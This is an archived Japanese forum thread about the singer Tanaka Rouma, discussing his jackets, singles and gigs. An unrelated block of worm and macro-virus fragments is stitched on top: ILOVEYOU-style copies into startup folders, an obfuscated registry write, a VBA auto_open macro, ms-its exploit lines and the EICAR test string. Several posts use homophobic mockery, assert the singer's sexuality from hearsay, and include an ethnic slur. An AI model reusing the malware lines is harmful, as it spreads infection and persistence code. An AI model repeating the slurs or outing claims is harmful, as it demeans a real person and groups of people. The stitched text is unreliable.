Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

171 :NO MUSIC NO NAME:2006/06/30(金) 22:06:15 ID:1+dpf1Dz
あのジャケットは神だろ。圧倒的筋肉美。

マジで惚れたよ。

172 :NO MUSIC NO NAME:2006/07/02(日) 21:20:59 ID:+oNhmgni
なんか韓国人っぽくてヤダ

173 :NO MUSIC NO NAME:2006/07/04(火) 02:43:07 ID:klYA13H+
ジャケがきもくて買えない。
なんかあれでスタイリストがいるんならもう少し考えてあげればいいのに。

174 :NO MUSIC NO NAME:2006/07/04(火) 18:35:36 ID:9bV/lGU8
ジャケットがホモっぽくてキモい。

175 :NO MUSIC NO NAME:2006/07/05(水) 14:11:54 ID:IbWaPwmR
こいつ、俺に似てる。

176 :NO MUSIC NO NAME:2006/07/06(木) 02:31:03 ID:PVj9CNQV
>>174
ホモなんだから仕方がない。

177 :NO MUSIC NO NAME:2006/07/06(木) 13:20:52 ID:qWQ3137K
ごめん。今、鏡見直したけど全然似てなかった。

178 :NO MUSIC NO NAME:2006/07/08(土) 01:42:56 ID:4FO2J3nx
やっぱホモかぁ。。
三浦大地のホモ版。。きもい。

179 :NO MUSIC NO NAME:2006/07/08(土) 20:21:48 ID:h/I62/j5
なんか新日の棚橋に似てる

180 :NO MUSIC NO NAME:2006/07/09(日) 01:17:36 ID:1WHbbhKP
ということはチョンづらということじゃねーかwwww
棚橋の方がタッパもあるし全然カッコイイけどな。レスラーにしてはチッコイけど。

181 :NO MUSIC NO NAME:2006/07/09(日) 20:59:29 ID:p7ilrADe
なんであんなキモいタンクトップをわざわざジャケにするんだ?

182 :NO MUSIC NO NAME:2006/07/09(日) 22:30:19 ID:Fe+yhSPu


183 :NO MUSIC NO NAME:2006/07/12(水) 01:17:17 ID:VFfQhWck
ロウマって本名なんだね。芸名だと思ってた。

184 :NO MUSIC NO NAME:2006/07/12(水) 08:30:07 ID:EJ5G9gZf
ううん、本名は田中ヒロマサだよ

185 :NO MUSIC NO NAME:2006/07/12(水) 21:09:37 ID:VFfQhWck
ミドルネームがロウマなんだって。
http://www.e-radio.co.jp/blog/lakeside/archives/000383.html

186 :NO MUSIC NO NAME:2006/07/13(木) 07:56:39 ID:6JOkXplc
そうだったのか…知ったかぶってしまって申し訳ない…m(__)m

187 :NO MUSIC NO NAME:2006/07/14(金) 00:37:57 ID:HeijajHZ
申し訳目から花咲いた!

188 :NO MUSIC NO NAME:2006/07/14(金) 01:23:06 ID:VjGVGkCp
ttp://lilylilylily.jugem.jp/images/495368_1416921611.jpg

189 :NO MUSIC NO NAME:2006/07/15(土) 10:10:16 ID:npGcHmbO
ジャケット なんでそんなに叩かれる?
ノンケ♀だけど言うほどそんなカマっぽく感じないし
ナチュラルメイクでカコイイと思う

190 :NO MUSIC NO NAME:2006/07/16(日) 18:18:50 ID:Fdp+11pO
>>189
俺も普通だと思うよ。みんな、ゲイにしたてあげたいんだよ。

191 :NO MUSIC NO NAME:2006/07/16(日) 23:08:42 ID:jJFH5ib2
普通にジャケはキモイと思う。
裏ジャケのほうを使えばよかったのにと思う。

>>190
ゲイにしたてあげたい以前にゲイだからw

192 :NO MUSIC NO NAME:2006/07/17(月) 13:12:40 ID:rsZ8MWMT
>>191
根拠も無いのに知ったげに断定する奴って結構いるよなー。そういう連中って信用できねぇ。
一流のパフォーマンスしてくらたらゲイだろうと構わない。

193 :NO MUSIC NO NAME:2006/07/18(火) 09:04:20 ID:rfR2S3GI
女の子にモテたくてダンス始めたとか言ってるのに、ゲイなわけないよー

194 :NO MUSIC NO NAME:2006/07/18(火) 19:09:09 ID:uVgYgJ9R
マッチョはゲイって認定したがってる人ってホモ?

195 :NO MUSIC NO NAME:2006/07/18(火) 21:12:32 ID:OlmW0wL2
ゲイじゃないと思い込みたいならそれでいいんじゃない?
デビュー前から2丁目徘徊してたのにね プッ

196 :NO MUSIC NO NAME:2006/07/18(火) 22:31:06 ID:uVgYgJ9R
でもPVは女性との恋愛を匂わせてるよ?
ホモの人ならセクシャリティに反してるんじゃない?

197 :NO MUSIC NO NAME:2006/07/19(水) 01:12:34 ID:52XRKlae
>>195
そんなことまで知ってるアンタがゲイw

198 :NO MUSIC NO NAME:2006/07/19(水) 02:50:55 ID:f+ZXatdN
衣装がゲイ御用達のアバクロ

199 :NO MUSIC NO NAME:2006/07/19(水) 10:16:51 ID:XNE7+JBC
>>196
ホモを前面に出すのは事務所もレコ社も嫌がるだろ
そっちの方ばっか先行して、話題になるかもだが

200 :NO MUSIC NO NAME:2006/07/19(水) 23:39:25 ID:52XRKlae
というか、ロウマをゲイゲイって言って、ゲイの証拠挙げる人って墓穴掘ってない?だって普通の人はゲイ御用達とか知らないよw
そういう人って、ロウマを自分の仲間にしたいんだねw

201 :NO MUSIC NO NAME:2006/07/20(木) 22:07:52 ID:fKY/SKcM
better days で ミリヤが「ウーラーラーラー♪」っていう曲ってなんだっけ?

202 :NO MUSIC NO NAME:2006/07/21(金) 19:48:16 ID:AlfkDVKJ
>>201
Fu-Gee-La?
わかんないけど。

203 :NO MUSIC NO NAME:2006/07/21(金) 20:58:02 ID:dzwMt2+W
別に俺はロウマの顔や体に魅せられてロウマの歌を聴いてるわけじゃない。
ロウマの突き抜けるようなあの澄んだ前向きな歌、歌声に魅せられてロウマの歌を聴いているんだ。
だから、ロウマがゲイかどうかなんて俺にとっては微塵の意味も成さない。
俺はこれからもロウマの歌を聴き続けるつもりだ。

204 :NO MUSIC NO NAME:2006/07/25(火) 12:09:34 ID:fciXuonX
で、そういうあなたは結局ゲイなのね。

205 :NO MUSIC NO NAME:2006/07/27(木) 11:36:02 ID:DQlpFsIM
youtubeのbarretswimmerって人のコメント見てみて…

206 :NO MUSIC NO NAME:2006/07/27(木) 18:09:11 ID:90NktDKu
ロウマくん、モンコーは感じるタイプなんでしょうか。
気になります。

207 :NO MUSIC NO NAME:2006/08/01(火) 14:40:12 ID:Qp74EM81
http://www.hmv.co.jp/product/detail.asp?sku=1255873

208 :NO MUSIC NO NAME:2006/08/01(火) 15:35:09 ID:DJjWCHIx
10/4に2nd Singleが出るんだね!c/wにはbetter days(ロウマver.)かぁ。楽しみ。無理だろうけど、POPさは少し抑え目でお願いします。

209 :NO MUSIC NO NAME:2006/08/05(土) 08:02:26 ID:MVgeQgTv
この人ホモ?

210 :NO MUSIC NO NAME:2006/08/06(日) 04:38:01 ID:Iw4PGz36
ホモだったら何か悪いんですか?
彼は友達思いで性格いいし、すげーまっすぐに生きてるやつ。
彼を気持悪いとか言う前に鏡で自分の醜さを確かめたら??

211 :NO MUSIC NO NAME:2006/08/21(月) 19:07:45 ID:+8dVSjF/


212 :NO MUSIC NO NAME:2006/08/23(水) 03:00:11 ID:1Xemjx/H
ホモという嗜好がきもいっていうより
いかにもホモっぽいダンスや体がキモいんだよ

213 :NO MUSIC NO NAME:2006/08/23(水) 08:01:28 ID:Kq3sOKqw
2nd Singleのタイトルは【Not Alone】に決まったね!

アホはほっといて、ロウマ頑張れ!純粋に俺は応援してるから!!

214 :NO MUSIC NO NAME:2006/08/26(土) 12:29:29 ID:9H8t6qg8
アッー!!

215 :NO MUSIC NO NAME:2006/09/03(日) 10:28:14 ID:Rz+IgUnz
Not Aloneのジャケ決まったね。

216 :NO MUSIC NO NAME:2006/09/03(日) 23:38:22 ID:XTgmsvlQ
へえ

217 :NO MUSIC NO NAME:2006/09/05(火) 01:41:17 ID:x2PNtAXN
これからも頑張って、息の長い、大きなアーティストになってほしい!ホントに応援しています!

218 :NO MUSIC NO NAME:2006/09/05(火) 03:30:30 ID:MvoeyW20
身長低いって言ってる人多いけどけっこう高いよこの人
どっかで身長体重見た

219 :NO MUSIC NO NAME:2006/09/07(木) 15:05:55 ID:8DwS5hAt
毎年恒例のMINAMI WHEEL 2006に田中ロウマの出演が決定しているので
専用スレを宣伝しにきました
またお暇な時にでも立ち寄ってください。
【802】MINAMI WHEEL 2006【オキシライド乾電池】
http://music6.2ch.net/test/read.cgi/minor/1153761032/


220 :NO MUSIC NO NAME:2006/09/09(土) 13:15:34 ID:cLkDbEYJ


221 :NO MUSIC NO NAME:2006/09/12(火) 23:24:30 ID:8tHfp/Ek
田中ロウマ 「Not Alone」
2006/09/13 00:00-00:30 [SSTV] NEW CUTS (2曲目)
2006/09/13 16:30-17:00 [SSTV] NEW CUTS (2曲目)

222 :NO MUSIC NO NAME:2006/09/14(木) 00:56:24 ID:pFXdoOlf
田中ロウマが所属してるレコード会社ってキングレコードだけど、じゃあ、所属事務所はどこなの?

223 :NO MUSIC NO NAME:2006/09/15(金) 00:17:41 ID:8x8/FSju
アキ企画

224 :NO MUSIC NO NAME:2006/09/18(月) 18:52:30 ID:ISNR2HMM
JAPAN

225 :NO MUSIC NO NAME:2006/09/22(金) 03:46:38 ID:agtaxGnP
PV俺が作るんだったら衣装をもっと考えるな。
ライブはあれでいいと思うけど、
せっかくのダンスなのに、
なんだかスポーツクラブのイントラっぽいと思う。
素材がいいだけに惜しいね。
応援してるけどさ。。。

226 :NO MUSIC NO NAME:2006/09/23(土) 00:15:56 ID:liGZFplJ
たいそうのおにいさん ってかんじ

227 :NO MUSIC NO NAME:2006/09/23(土) 00:31:30 ID:cQ/8kIfO
new single よろしくお願いします m(._.)m

228 :NO MUSIC NO NAME:2006/09/23(土) 03:49:16 ID:LBXQ7/ut
ロウマ応援してるよ。でもスタイリストと監修したの誰?
キングに越権行為なんでやめとくけどさ。


229 :NO MUSIC NO NAME:2006/09/23(土) 20:21:51 ID:KQ0gCRIx
まだ殆ど私服でしょ。

230 :NO MUSIC NO NAME:2006/09/26(火) 03:34:51 ID:4ftjkxmG
とうとう日本にもこのレベルのシンガーが登場したって感じだな。
こいつがオリコンで一位取るようなチャートに早くなって欲しい

231 :NO MUSIC NO NAME:2006/09/26(火) 21:35:01 ID:wHuz3niM
実力はともかく外見が日本の空気読めてない

232 ::2006/09/29(金) 18:18:03 ID:OnjHv+It
はじめまして。
日本の空気読めてないのは私も同感。
露出し過ぎで、逆にセクシーさを感じない・・・。

でも、ダンスはクラシック過ぎるとかって事じゃなく[JAZZ HIPHOP]という一つのジャンルなんですよ!!

上手い、下手は別にして・・・
振り付けがワンパターン。

整形はしてないんじゃ・・・


233 :NO MUSIC NO NAME:2006/09/30(土) 05:01:06 ID:2otwVVBJ
っていうほど歌上手くないだろ。嫌いじゃないけど。
美形じゃないのにナルシスト全開なふいんき(ryは、やっぱちょっとひくわな。

234 :NO MUSIC NO NAME:2006/09/30(土) 22:04:37 ID:gi6a9uKb
そうか?
全然ナルシスな感じはしないぞ。
イントラ、室伏っぽい

まだピ(rain)のほうが人気でそう

235 :NO MUSIC NO NAME:2006/10/01(日) 01:23:33 ID:gOafjC9l
ロウマにあった(ノ∀≦*)めっちゃやさしかったー!
でもたぶん彼はナルだ…

236 :NO MUSIC NO NAME:2006/10/01(日) 02:11:06 ID:vUu/xwze
HI-Dと最初はかぶって見えた…

237 :NO MUSIC NO NAME:2006/10/01(日) 03:16:07 ID:KLh7sWN1
確かに実力、素材はいいけど日本のシーンの空気読めてない気がする。アイのストーリーじゃないが、詞もぐっとくるような曲で楽曲と歌唱力で一回勝負してほしいな。あとタンクトップと筋トレやめれ

238 :NO MUSIC NO NAME:2006/10/01(日) 12:40:53 ID:jCFijP38
アッー!!

239 :NO MUSIC NO NAME:2006/10/02(月) 19:22:19 ID:b2spLbKQ
544 :陽気な名無しさん [sage] :2006/09/23(土) 17:52:43 ID:NYoaMJqw
新曲の元ネタってこれでしょ?

Jesse McCartney~Beautiful Soul
http://www.youtube.com/watch?v=UvnXDd6wXHU
http://www.youtube.com/watch?v=G6vh-lw4pEU

ヒラリー・ダフの男バージョンみたいな子。
良い曲よね。

ローマもっと、釜キャラで頑張るべきよ!!応援してるわ!!


240 :NO MUSIC NO NAME:2006/10/04(水) 13:03:28 ID:utnd1cWK
30分ほど前、京都のFMにゲスト出演してたよ。
ノリのいいさわやかお兄ちゃんってかんじだった。
今日はTシャツ着てきたらしい。
最後にタンクトッププレゼント募集してた。
わざわざプレゼント用に発注したらしいのでどんなのか見てみたいな…

241 :NO MUSIC NO NAME:2006/10/05(木) 20:24:44 ID:iq2fXO9L
>>237
あんなベタベタなバラードなんて聴いてられん

242 :NO MUSIC NO NAME:2006/10/07(土) 04:54:04 ID:WDtB8jor
ロウマ応援してるよ!

243 :NO MUSIC NO NAME:2006/10/11(水) 11:36:36 ID:+bY/ZyVS
ロウマ露出が足りなさすぎだから...

244 :NO MUSIC NO NAME:2006/10/11(水) 16:43:05 ID:FfG5ucua
田中ロウマ
**2,481 *54 06.06.07 One/No Change No End
**1,383 *65 06.10.04 Not Alone

245 :NO MUSIC NO NAME:2006/10/11(水) 18:24:35 ID:SbNSGjx3
そのうち900枚くらいはローマの身内と会社買取じゃねww

246 :NO MUSIC NO NAME:2006/10/13(金) 19:52:43 ID:hY3mLdB+
ゲイにも人気ないのかorz

691 :陽気な名無しさん :2006/10/13(金) 01:06:11 ID:7lSQzTDA
良くも悪くも話題にのぼるうちはまだマシだと思うわ。
あのメイクでYESとかゲイ媒体に出てゲイ受け狙ってるみたいだけど
ここでの評判はあんまり良くないわねw

247 :NO MUSIC NO NAME:2006/10/14(土) 16:22:29 ID:SGGP4aIY
歌い方が重い・・・
凄く重くて疲れる・・・

248 :NO MUSIC NO NAME:2006/10/17(火) 14:19:04 ID:b72K41q7
NHKのラジオ番組で、司会者が新曲を
「アップテンポなミディアムナンバー」
と言って紹介してた。

249 :NO MUSIC NO NAME:2006/10/22(日) 06:53:28 ID:np4PGhLL
a

250 :NO MUSIC NO NAME:2006/10/22(日) 11:08:36 ID:q8mVXY9S
>>226
ジムのイカニモなおにいさんってかんじ。

251 :NO MUSIC NO NAME:2006/10/27(金) 19:11:57 ID:uAlS02as
今739で生ライブやってるの見たが・・・これはダメだ。日本では受けない

252 :NO MUSIC NO NAME:2006/10/28(土) 11:46:51 ID:oH4717Ew
日本以外でも受けないと思うが。

253 :NO MUSIC NO NAME:2006/11/02(木) 20:02:33 ID:Ul+gMDcE
ライブみてみたい

254 :NO MUSIC NO NAME:2006/11/04(土) 03:26:25 ID:uZpiqkIv
ヤバいカッコ良い!b"
後ろからギュッてされたいよ!ハン

255 :NO MUSIC NO NAME:2006/11/04(土) 22:50:17 ID:Vj7BHtam
私もヤバイくらいハマッてるよ♪
モムチャン好きだし、ダンスの腰使いもめちゃセクシーで
一緒に腰絡ませて踊ってるダンサーのオネーチャンがうらやましすぎっ!

でもそーゆー見た目だけに惑わされちゃいけません。
ロウマのバラード聴いたらあまりのうまさに鳥肌ものよ〜。
子供の頃、オペラ歌ってたそうなのであの歌唱力は基礎が
モノホンです。
細かいコーラスの音をよーく聞くと、コーラス部分、全部自分の声で
歌い方とか声の高さも全部変えて何層にもミックスで重ねてハモッてるけど
普通、そんな神業テクニック出来る人いないでしょー。
作詞作曲の才能もあるし、いろんな引き出しがありすぎて今までの
日本の常識の枠じゃ規格外だよねぇー。
日系アメリカンだから英語で教育受けたはずなのに、なんでこんな
キレイな日本語の表現知ってるんだ?って感心しちゃうし。

私的には絶対ブレークするって信じてるけど、彼がこの先、
どういう方向に進むのかとても心配だなぁ〜。
いつか世界にも通用する大物アーティストになって欲しいなぁ。

ちなみにもしも本当にゲイだったとしても、なにか問題でも?笑。
全部ひっくるめてロウマはロウマだから私はぜんぜんオッケ。
喜んで「おこげ」と呼ばれましょう♪ 

256 :NO MUSIC NO NAME:2006/11/05(日) 00:45:28 ID:xHT29FUL
 

257 :NO MUSIC NO NAME:2006/11/06(月) 23:48:37 ID:73B+n/Rd
 

258 :NO MUSIC NO NAME:2006/11/10(金) 04:57:05 ID:yBq5WO52
あんたバカでしょ。

259 :NO MUSIC NO NAME:2006/11/10(金) 18:55:08 ID:i/yo4IYm
彼は本当にゲイだよ。
サンフランシスコのHANAZENていう不味い日本食レストラン
(ホテル日航と同じブロック)で少し働いてて、
自分から公言してました。

歌手としても公言すればいいのに。問題がないなら。



260 :ロウマのオコゲ:2006/11/11(土) 15:57:24 ID:kmUv6mQj
ま、服とか仕草とか喋り方からも「多分、かなりの確率で
ゲイっぽいよなー」とは薄々、いや、濃濃、思ってたけど
そっかー。やっぱそうなのね。

でも、別にいーじゃん。
彼が本物のゲイだったとしても、芸は本物なんだから。
『ゲイは身を助ける』って言うし。
...あ、ちょっと違うか...。(~_~;)

中村中さんみたいに「性同一性障害」をカミングアウトして
ある意味、それを「売り」ってか「きっかけ」にして注目集めて
売れた人もいるから公言しちゃうのも「手」かも?
...でも、ますますどん引く人多いだろうなぁ〜。

ま、そういうの置いといて、ロウマの実力だけでみんなに認められる
日がくることを祈ってるよ〜。

261 :NO MUSIC NO NAME:2006/11/11(土) 16:19:32 ID:MKiGmIQi
ゲイが好きな男 ベスト5 - All About
http://allabout.co.jp/relationship/homosexual/closeup/CU20061103A/index2.htm

70位らしい・・・

262 :NO MUSIC NO NAME:2006/11/12(日) 23:19:31 ID:NZkxrL/q
「Not Alone」のPVで、赤い椅子の撮影場所ってどこ?

263 :NO MUSIC NO NAME:2006/11/30(木) 22:06:48 ID:iaSphqtD
アーッとかウホッとかってなに?

264 :NO MUSIC NO NAME:2006/12/02(土) 00:28:31 ID:Si4i3ecq
ロウマはホモだニョ

265 :NO MUSIC NO NAME:2006/12/03(日) 14:59:18 ID:VGtulwxG
14日のライブ当選したぁ〜初ロウマライブ見てきます♪♪♪

266 :NO MUSIC NO NAME:2006/12/14(木) 21:59:00 ID:JadQqeSW
>>265
どうだった?
Not Aloneの前は何か歌ってた?

267 :NO MUSIC NO NAME:2006/12/14(木) 22:54:38 ID:0JGyvhxH
最初がNotAloneで、ダンスで魅せた後、未発表曲の素晴らしいバラードできかせてくれて、その後アカペラでONEを、最後にNoChange〜でかっこよく終わりました!やばいぐらいうまかった!!トークも面白いしすごく優しくて、パーフェクトだった!!

268 :266:2006/12/14(木) 23:20:26 ID:y5KQe5TL
>>267
Not〜が一曲目だったんだ
もうちょっと早く見ればよかった…

大阪の方はノリが良かったね


269 :NO MUSIC NO NAME:2006/12/15(金) 00:04:30 ID:mt3h2ehX
やっぱダンス歌手って人気出ないね。
他のダンス歌手ファンとしては
少し期待してたんだけど・・・。
残念。。。。。

270 :NO MUSIC NO NAME:2006/12/15(金) 01:53:39 ID:rtLcZN2r
ロウマのパフォーマンスはやばいくらいすごかったよ…!!歌もダンスも完璧!!バラードもうまいし。ほんと声質がいい。生で見て聴いて更に大好きになりました。もっとメディア露出してくれ〜

271 :NO MUSIC NO NAME:2006/12/15(金) 07:46:48 ID:E3up0UsD
年末年始露出無し??´Д`

272 :NO MUSIC NO NAME:2006/12/16(土) 15:46:13 ID:mIMslJcS
メディア露出はないみたい…ロウマのワンマンライブあったら絶対行きたい〜

273 :NO MUSIC NO NAME:2006/12/25(月) 19:33:04 ID:92jdsNke
ロウマは日本女性の好みには合わないのか
ジャニみたいに「ちょっと筋トレしました」程度の筋肉じゃないと受け付けないのか…

274 :NO MUSIC NO NAME:2006/12/26(火) 02:26:46 ID:PnZpHcel
私はロウマ好み(〃▽〃)大好きだぁ♪

275 :NO MUSIC NO NAME:2006/12/26(火) 22:45:24 ID:o5dUCNZa
。。。

276 :NO MUSIC NO NAME:2006/12/27(水) 02:32:47 ID:1lhYWwtF
なんか体操のお兄さんって感じが否めない。

277 :NO MUSIC NO NAME:2006/12/31(日) 17:31:01 ID:qbcBdFoo
 

278 :NO MUSIC NO NAME:2007/01/03(水) 16:05:18 ID:v8XE6GC8


279 :NO MUSIC NO NAME:2007/01/06(土) 23:00:53 ID:K8nAibl9
めちゃめちゃすき
歌だいすき

280 :New Jap:2007/01/08(月) 14:55:10 ID:zrvjM0XJ
管理人様へ
ご不要および不適切な場合は削除してください。
****クーポンは文の最後についております****
今回は神奈川県厚木市(本厚木)にありますCLUB DAZZから告知させていただきます。
----------------------------------------------------
1/20(土)
LADYS FREE NIGHT SPECIAL
スペシャルゲスト・田中ロウマ(童子-T、加藤ミリヤと共演している実力派シンガー)
毎月第3土曜は24時までLADY FREE女性入場無料です
22:30START
DOOR 3000円(1D)
ADV 2000円(1D)
DJ CLUB DAZZ ALL STARS
DANCE SHOWTIMEあり!!
----------------------------------------------------
2/3(土)
NEW JAP NIGHT meets お笑い
スペシャルゲスト・鉄拳(世界の平和を守る超未来戦士!?)
毎月第1土曜はお笑い芸人をゲストに迎え大盛り上がりお送りしております!!!
DOOR 3000円(1D)
ADV 2500円(1D)
DJ CLUB DAZZ ALL STARS
DANCE SHOWTIMEあり!!
----------------------------------------------------
***クーポン********クーポン********クーポン****
受付でこの書き込みを見たといった人はDOOR料金がなんと!?半額に!!!!
***クーポン********クーポン********クーポン****

CLUB DAZZ&NEW JAP SWINGのHP&BLOGになります更に詳しい
情報をお求めの方はこちらへ↓↓↓↓↓↓↓↓

NJS&DAZZ ホームページ
http://www.newjapswing.com
NJSの&DAZZ MAIN BLOG
http://blog.njs.shop-pro.jp/
NJS(何でも写真館)&CLUB DAZZスナップBLOG
http://njsage.jugem.jp/
NJSの&DAZZマスコット(犬達)成長期+スロット奮闘記 +? BLOG
http://blog.goo.ne.jp/newjapswing/

総合お問い合わせ
newjapswing-dazz@star.odn.ne.jp


281 :NO MUSIC NO NAME:2007/01/21(日) 10:42:44 ID:kzI4J/76
One
やっぱり大好き。毎日聴いてる

282 :NO MUSIC NO NAME:2007/01/23(火) 20:00:36 ID:vlcIxq0B
また延期・・・
http://www.hmv.co.jp/product/detail/1213092

283 :NO MUSIC NO NAME:2007/01/24(水) 09:25:22 ID:JoLyrYC3
ブログ読むたびに冷めるわ・・・センスの無さに。

もうどうでもいいわこんな男、大して男前でもないし・・・

284 :NO MUSIC NO NAME:2007/01/27(土) 18:01:03 ID:C504VW1d
>>283
どんな内容なの?

285 :NO MUSIC NO NAME:2007/02/06(火) 15:59:25 ID:6s+q/uE1
-------------------------------------------------------
BANGIN 4thAnniversary×movement 5th Anniversary

3月19日
会場:渋谷o-east
OPEN 14:30
START 15:00

前売り券/3000/ 当日券/3500/(共に別途ドリンク代500必要)

☆LIVE        ☆DANCE
 加藤ミリヤ      7down 8uppers
 田中ロウマ      RAG POUND+RAGGED SOUL
 Foxxi misQ      squall noize
 twenty4-7       PRIMETIME
 TAO&NAGI

チケット発売開始日
2月14日

ローソンチケット【Lコード 37307】

問い合わせ先

info@jens.to(件名に5周年イベントと記載をお願いします)
-------------------------------------------------------

286 :NO MUSIC NO NAME:2007/02/07(水) 01:16:29 ID:tYTIecXr
http://www.tinyvoice.com/blog/uta/
http://www.cdjournal.com/main/cd/disc.php?dno=4106101646

287 :NO MUSIC NO NAME:2007/02/10(土) 17:50:47 ID:pMjT0l30
3rd Maxi Single「New Day」
2007.4.4 On Sale

1 New Day
2 Under The Sun
3 New Day(School Girl~uta Mix~)
4 New Day(Instrumental)

288 :NO MUSIC NO NAME:2007/02/18(日) 17:53:52 ID:RQ5DhWM9
16日の渋谷asiaに行ったよ〜
クラブは初めてだったんだけど、あんなにボディチェックやら
荷物検査するとは思わなかった。

出演は3時頃。
4時間近くうろうろしながら待ってました。
新曲2曲と「Not Alone」を歌ってくれました。
ダンサー5人くらい引き連れてたけど、
お金だいじょうぶなのかな? と余計な事を思いました。

黒のタンクトップで司会のお姉さんも言ってたけど、
ますますマッチョぶりに、拍車がかかってました。

途中、お母さんが送ってくれたらしいチョコを会場に
プレゼント! アルバムは4月下旬発売と言ってました。

帰りにロウマと遭遇したけど、何も言えなかった・・・
同じ時に帰る人がかなりいたから、皆「ロウマ」狙いだったのかも。
あの時間で帰るのが大変でした。行きたいけど、クラブはもういいや。

でも満足でした。

289 :NO MUSIC NO NAME:2007/02/19(月) 20:16:43 ID:GW/1XifI
>>288
乙でした。
アルバム楽しみだ♪

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)